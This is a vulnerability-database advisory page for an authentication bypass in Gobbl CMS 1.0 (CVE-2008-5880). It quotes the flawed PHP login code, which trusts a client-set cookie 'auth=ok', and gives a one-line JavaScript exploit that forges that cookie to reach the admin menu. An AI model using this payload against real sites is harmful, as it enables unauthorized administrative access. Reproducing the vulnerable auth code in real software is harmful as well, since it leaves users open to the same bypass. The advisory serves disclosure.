Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Gobbl CMS 1.0 Insecure Cookie Handling Vulnerability
2009.01.10
Credit:
x0r
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-5880
CWE:
CWE-287
CVSS Base Score:
7.5/10
Impact Subscore:
6.4/10
Exploitability Subscore:
10/10
Exploit range:
Remote
Attack complexity:
Low
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
Partial
Availability impact:
Partial
--------------------------- Gobbl Cms 1.0 I.Cookie Hand. --------------------------- Autore: x0r ( Evolution Team) Email: andry2000@hotmail.it Demo Site:http://www.gobbl.net/ --------------------------- Bug In: \admin\auth.php ?> include ('../config.php'); $user = $_POST['user']; $pass = $_POST['pass']; if ( ($user == $un) and ($pass == $pw) ) { setcookie( "auth", "ok", time()+40000 ); # Bugz header ( "location:add.php" ); exit (); } else { header ( "location:index.php" ); exit (); } ?> Il file auth.php controlla se nel file ../config.php le post $user\$pass presentano gli stessi dati delle variabili $un\$pw ( config.php ) se così à setta il cookie auth=ok :P ^ ^ Exploit: javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy To Hack :P Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Giù...Ti AmO
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top